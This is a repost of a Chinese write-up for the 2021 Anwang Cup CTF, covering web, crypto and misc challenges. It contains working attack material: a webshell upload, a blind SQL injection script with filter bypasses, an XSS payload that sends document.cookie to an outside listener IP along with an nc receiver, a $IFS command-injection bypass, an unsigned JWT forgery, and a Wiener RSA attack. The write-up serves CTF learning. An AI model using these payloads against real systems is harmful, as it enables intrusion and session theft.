2021安网杯部分wp
Posted ying-hack
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2021安网杯部分wp相关的知识,希望对你有一定的参考价值。
Web
Web01
Web的第一个是文件上传。上传一个一句话图片,然后抓包改一下后缀名。改为php。提交之后,蚁剑连接直接去读取flag就可以了。
Web02
第二个Web题是sql注入题。提示的非常明显,输入’直接报错。
布尔型sql注入题,过滤了=,like等form,for绕过,<>绕过 =
献上大佬的代码
import requests
from requests.models import encode_multipart_formdata
class TrickUrlSession(requests.Session):
def setUrl(self, url):
self._trickUrl = url
def send(self, request, **kwargs):
if self._trickUrl:
request.url = self._trickUrl
return requests.Session.send(self, request, **kwargs)
def format(s):
s = s.replace(" ","/**/")
s = s.replace("and","%26%26")
return s
def sql(payload):
burp0_url = "http://172.20.2.2:9001/"
# burp0_url = "http://127.0.0.1:9001/"
burp0_cookies = {"session": "eyJ1c2VybmFtZSI6Imd1ZXN0In0.YJn_9g.ovL1KTEt9f9hjEDMoZoplRtnEc"}
burp0_headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"AcceptLanguage": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"AcceptEncoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
"Origin": "http://172.20.2.2:9001",
"Connection": "close",
"Referer":"http://172.20.2.2:9001/",
"Upgrade-Insecure-Requests": "1"
}
burp0_data = {"from": "1", "to": f"{payload}"}
# print(burp0_data)
res = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies,data=burp0_data)
# print(burp0_url,len(res.text))
if "ဌํྌ" in res.text:
return True
# print(format("and (select user() like 'r%')"))
chars = '{}-ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghiklmnopqrstuvwxyz0123456789,'
s = ""
for i0 in range(1,999):
for i in range(len(chars)):
# database train
# flaggtable,tickets
# flaggcolumn
# payload = format(f"-1' or ascii(mid((select group_concat(column_name) from information_schema.columns where table_name in ('flagtable')) from {i0} for 1)) <>'{ord(chars[i])}")
payload = format(f"-1' or ascii(mid((select flagcolumn from flagtable) from {i0} for 1))<>'{ord(chars[i])}")
# payload = format(f"-1' or ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema in (database())) from {i0} for 1)) <>'{ord(chars[i])}")
# payload = format(f" and substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{i0},1)='{chars[i]}'")
if sql(payload):
s += chars[i]
print(s)
Web03
这个题一看和Hgame的Week3的一个Web题很像。想到用XSS来获取Cookie参数。在首页查看过滤情况。在反馈页面提交payload来获取Cookie。带着Cookie来访问admin网页。
先在本地搭建接听Cookie的js.
献上大佬的js代码
username=document.cookie
var xmlhttp = window.XMLHttpRequest ? new XMLHttpRequest() : new
ActiveXObject('Microsoft.XMLHTTP');
xmlhttp.open("POST", "http://172.20.20.165:8081/", true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.onreadystatechange = function ()
{
if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
{
if(xmlhttp.responseText=='1')
location.href='./admin/backendmanage.php';
else
alert("Login Failed!");
}
}
xmlhttp.send("username="+encodeURIComponent(username));
python3 -m http.server 8000启动web服务访问js
nc -lv 8081 用来接收cookie
/func2?name=%3Cscscriptript+src%3D%22hhttpttp%3A%2F%2F172.20.20.165%3A8000%2F1.js%22%3E%3C%2Fsscriptcript%3E&submit=Get+It%21
Web04
这个直接提交get参数?txt=flie:///flag读取flag
Web05
include("/etc/passwd")提示有openbasedir
scandir system等函数提示被ban没有cat命令。直接more空格$IFS$9进行绕过,因为写到PHP中所以需要\\转义
?action=upload&data=<?='more\\$IFS\\$9../../../../../../f1*\\$IFS\\$9/1'?>
Web06
查看robots.txt可以看到用户名guest密码后来比赛方给出了字典
提交的账号密码都变成了账号:密码
然后base64加密。所以直接进行爆破可以查出来密码是letmein。登录后有一个admin的php打开显示不是admin查看cookie里面有一串jwt格式的session。题目没有key ,于是猜测没有key。生成无认证的jwt带着jwt访问成功跳转。得到flag.php和id_rsa。利用rsa解出flag密码
Crypto
凯撒也喜欢二进制
先查看二进制,发现二进制长度除以8余7所以在前边补一个0
然后对二进制进行转字符串发现是base加密,经查证是base32加密。
然后base32解密,是一串16进制数据。然后根据凯撒提示对数据进行移位。直到转出来的字符串里面有flag这个字符串就输出。
脚本如下
import base64
a = '010011010100110100110010010101110100110101001101010000100101101001001101010011100101001101010100010010110101101001001100010001110100100001000110010100100101011101000011010110100100010001000011010001110100111001010010010001000100011101011001010100100101001001001101010001010011010001000100010100110101100100110011010001010100110101010010010100110101011101000011010110100100101001010001010010000100011001010010010101110100011101001111010011000100011001001101010101100101000101010111010000110100111101001100010001000100110101001101001100110100011101001001010110100100010001000110010011010101011001010100010001000100010101011010010010100101011001001101010101100101010001000100010100110101100100110011010001000100100001000010010100110101011101000101010110100100110001000110010011010101011001010011010101110100110101001110010010100101101001001101010011100101001101010100010010110101101001001100010001110100100001000110010100100101011101001101010011010100010001000110010011010101011001010011010001110100100101011010010100100101001101001101010101010101100101010111010010110100111101000100010001100100011101010110010100110101011101000011010110100100101001010100010010000100011001010010010101110100110101001101010001000100011001001101010010010011010001010111010001110101100101011010010100010100110101010110010100100100011101001101010011010101010001000110010001110100011001010011010101110100101101001111010011000100010001001101010110010101100101000111010010110101100101010010010110100100110101001110010100110101010001010011010110100100101001010010010011010101010101011001010101110100110101001101010000100101101001001101010011100101001001010100010100010101101001010010010100100100110101010010010101000100011101001011010011100100110001000110010001110100010100110100010101110100011101011001010110100101101001001101010100100101001101000111010010110101100101001100010001100100011101000110010101000100010001000001010110100101001001010001010011010101010101011001010101110100001101011001010010100101101001001101010011100101001001010100010010010101101001001010010100100100100001000110010100100101011101001101010011010100010001000110010001110100011001010011010101000101000101011010010010100101100101001101010101100101010001000100010100110101100100110011010001100100011101010010010100110101010001000011010110100100110001000110010010000100011001010010010101110100110101001101010001000100011001000111010100100101001101000111010010010101101001010010010100010100100001000110010100100101011101001011010110100101010001000110010001110101001001010011010101000100001101001111010011000100010001001101010101010011001001010111010010110101101001010010010110100100110101001110010100110101011101000011010110100100110001000011010011010101100101011001010001000101001101011001001100110100010101001101010100100101001101010111010000110100111101001100010001000100110101010110010100100100011101001011010110100100110001000110010011010100111001010011010101000100100101011010010001000100010101001101010101100101000101010100010100110101100100110011010001010100110101010010010100110101011101001101010011110100110001000100010011010101011001010100010001110100101101001110010001000100011001000111010001010011010001010111010001110101101001001010010101010100110101010010010100110100011101001011010011010100001001011010010011010100111001010011010001110100101101011010010010100101001001001101010101010101100101010111010010110101100101001010010110100100110101001110010101000100010001000001010110100100110001000011010011010101010100110100010001110100101101001101010000100101101001001101010011100101001101010100010001010101101001001100010001100100110101010110010100100100011101001011010011110100101001011010010011010100111001010011010001110100100101001111010011000100010001001101010110010011001001010111010010110101100101010100010001110100011101000110010100110101011101000011010110100100101001010100010010000100011001010010010101110100100101011010010001000100011001000111010011100101001101010100010000110101100101001100010000100100100001000110010100100101011101001011010011010101010001000110010010000100001001010011010001110100100101011010010010100101010001001101010110010011001101010111010001010100110101010100010001100100011101000110010100100100010001000011010110100100101001010001010011010100100101011010010001110100101101001101010011000100001001001101010110100101001001000100010010110101101001000100010001100100110101001001010110010101011101000011010110100100110001000110010001110100001001010010010001000100101101011010010010100101001001001101010010010101101001010111010010110100110101001100010000100100110101001110010100110100011101001101010110010101001001010011010011010100100101011010010101110100001101011010010001000100001101000111010001100101000101010111010011010101101001000100010001010100110101001001010110100100011101000011010110010011001101000101010011010101101001010011010001110100101101011001010100100101001001001101010100100101010001000111010000110101101001010100010001010100110101011010010101000100010001010011010011110100110001000100010011010100110100110010010001110100101101001101010010100101101001001101010011100101001101010111010000110101101001001100010000110100110101011001010110100101010001010011010110010011001101000110010011010101101001010011010001110100100101011010010100100101011001001101010101100101010001000100010100110101100100110011010001110100011101000010010100110101010001001001010110100100010001000101010011010101100101011001010001000101001101011001001100110100011001000111010100100101001101010100010000110100111101001100010001000100110101011001010110100101011101001011010011100100110001000110010010000100001001010011010101000101000101001111010011000100010001001101010110010101100101000111010010110101101001001100010001010100110101010010010101000100010001000101010110100100101001010010010011010101010100110100010001000101001101011001001100110100011101000111010011100101001101010100010010110101101001010010010100010100110101010101001100100100010001010011010110010011001101000110010001110101001001010011010101000100001101011010010011000100011001001000010001100101001001010111010011010100110101000100010001100100110101001001001101000101011101000111010110010011001101000100010011010101001001010011010001110100101101011010010011000100011001000111010101100101001101010111010011010100111101001100010001000100110101011001010110010100011101001011010110010101001001011010010011010100111001010011010101000101001101011010010010100101001001001101010101010101100101010111010011010100110101000010010110100100110101001110010100110101010001001001010110100100101001010010010011010101011001010011010101000101001101011001001100110100011001000111010010100101001101000111010010010101101001010010010100010100110101010101001100100100011101001011010011010100110001000110010011010101011001010001010101000101000101001111010011000100010001001101010110010101101001010111010010110100111001000100010001100100110101001001001101000101011101000111010110100100101001010101010011010101001001010011010001110100101101011010010100100101101001001101010011100101001101010111010010110101101001001010010100100100110101010010010101000100011101001011010011010100110001000110010011010100011001010100010001000100000101011010010010100101100101001101010110010011001001010100010100110101100100110011010001010100110101010110010100110101010001000011010110100100101001010010010011010101011001010001010101000101001101011001001100110100011001001101010101100101001101010100010000110101101001001010010110010100110101010101010110010101011101001001010110100100010001000110010011010101101001010011010101000100001101011010010010100101000101001000010001100101001001010111010010110100110101010100010001100100110101010110010100110101011101000101010110100100101001011010010010000100011001010010010101110100110101001101010001000100011001000111010100100101001101010100010000110100111101001100010001000100110101001010010100110101011101001001010110100100010001000110010011010101101001010100010001000100000101011010010010100101011001001101010101010011010001000111010010110100111101000100010001100100011101000110010100010101011101000011001111010011110100111101'
for x,i in enumerate(a):
if x % 8 == 7 :
print(i,end='')
print('\\n',end='')
else:
print(i,end='')
Hex = ''
for i in range(0,len(a),8):
print(chr(int(a[i:i+8],2)),end='')
Hex += chr(int(a[i:i+8],2))
print()
b32 = base64.b32decode(Hex)
for sub in range(200):
flag = ''
for i in range(0,len(b32),2):
data = int(b32[i:i+2],16)
data = data - sub
try:
flag +=chr(data)
except:
pass
if 'flag' in flag:
print(flag)
else:
pass
借鉴EDI战队的Web的WP
easy_RSA
一开始真的没有解出来,一直想分解n但是一直没分解。后来发现直接可以用维纳攻击。
下面攻击代码放在这
一些安装的模块在https://github.com/pablocelayes/rsa-wiener-attack这里
from tools import *
from RSAwienerHacker import hack_RSA
import libnum
n = '1fb18fb44f4449f45ea938306c47b91f64b6c176bd24dbb35aa876f73859c90f0e1677d07430a1188176bc0b901ca7b01f6a99a7df3aec3dd41c3d80f0d17292e43940295b2aa0e8e5823ffcf9f5f448a289f2d3cb27366f907ee62d1aaeba490e892dc69dacbafa941ab7be809e1f882054e26add5892b1fcf4e9f1c443d93bf'
e = 'e42a12145eaa816e2846200608080305c99468042450925789504307cbc54a20ed7071b68b067b703a1679d861795542f8cbd2d1cb4d3847d0940cac018cdb0fa729571afbe10c1b8be2dd8acd99ee48b77d53c435b9c2fed59e12e02ad8cfc2bcc46ad85534c266dcc1f3a1a03d87118eaf3f5b3eeeb3be84ad023a4bf34939'
c = 'd19d63015bdcb0b61824237b5c67cb2ef09af0c6cd30e193ff9683357b1e45ab4df607b8c1e0b96cafc49a84d7e655c3ce0f71b1d217eec9ca6cdfa57dd3dc92533b79431aa8a7d6ca67ac9cdd65b178a5a96ab7ce7bf88440f4a9b9d10151b0c942a42fdab9ea2c2f0c3706e9777c91dcc9bbdee4b0fb7f5d3001719c1dd3d3'
n = int(hex_ten(n))
e = int(hex_ten(e))
enc = int(hex_ten(c))
d=hack_RSA(e,n)
m=pow(enc ,d ,n)
print(libnum.n2s(m))
Misc
misc1
打开给的文件。一个图片和一个流量包。
在流量包里面发现有flag.zip查看发现
不是真的flag,提示在aobai那。然后寻找aobai.zip
发现是个zip压缩包。然后将zip弄下来。放到kali里面进行binwalk文件分离。
有个16进制文件,进行16转字符串就出来flag了。
misc2
得到密文
5a6e4665536e506248206579666b7b39733930733833742d393637312d3433626a2d616f69302d3235663176393138707030377d
进行十六进制转换得到
ZnFeSnPbH eyfk{9s90s83t-9671-43bj-aoi0-25f1v918pp07}
然后对密文进行维吉尼亚解密
密文为eyfk{9s90s83t-9671-43bj-aoi0-25f1v918pp07}
密钥为ZnFeSnPbH
直接出flag
flag{9a90f83e-9671-43ac-bbd0-25b1d918ca07}
misc3
修改文件头为50解压
然后用7z直接提取文件。在文件头部补齐png文件头
89 50 4E 47然后将图片的高进行修改。最终出现flag
以上是关于2021安网杯部分wp的主要内容,如果未能解决你的问题,请参考以下文章